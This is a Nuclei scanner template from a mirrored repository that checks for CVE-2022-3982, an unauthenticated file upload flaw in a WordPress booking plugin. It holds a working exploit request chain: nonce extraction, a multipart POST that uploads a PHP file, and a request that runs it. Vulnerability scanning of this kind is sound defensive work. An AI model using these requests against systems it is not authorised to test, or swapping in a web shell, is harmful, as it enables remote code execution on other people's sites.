daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2022/CVE-2022-3982.yaml

81 lines
2.5 KiB
YAML
Raw Blame History

id: CVE-2022-3982
info:
name: Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The Booking calendar, Appointment Booking System WordPress plugin before 3.2.2 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
remediation: Fixed in 3.2.2
reference:
- https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867
- https://wordpress.org/plugins/booking-calendar/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-3982
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="action"
wpdevart_form_ajax
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="wpdevart_id"
x
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="wpdevart_nonce"
{{nonce}}
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="wpdevart_data"
{"wpdevart-submit":"X"}
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="wpdevart-submit"
1
--------------------------1cada150a8151a54
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("CVE-2022-3982"); ?>
--------------------------1cada150a8151a54--
- |
GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'var wpdevart.*"ajaxNonce":"(.*?)"'
matchers:
- type: dsl
dsl:
- contains(all_headers_3, "text/html")
- status_code_3 == 200
- contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
condition: and
Reference in New Issue View Git Blame Copy Permalink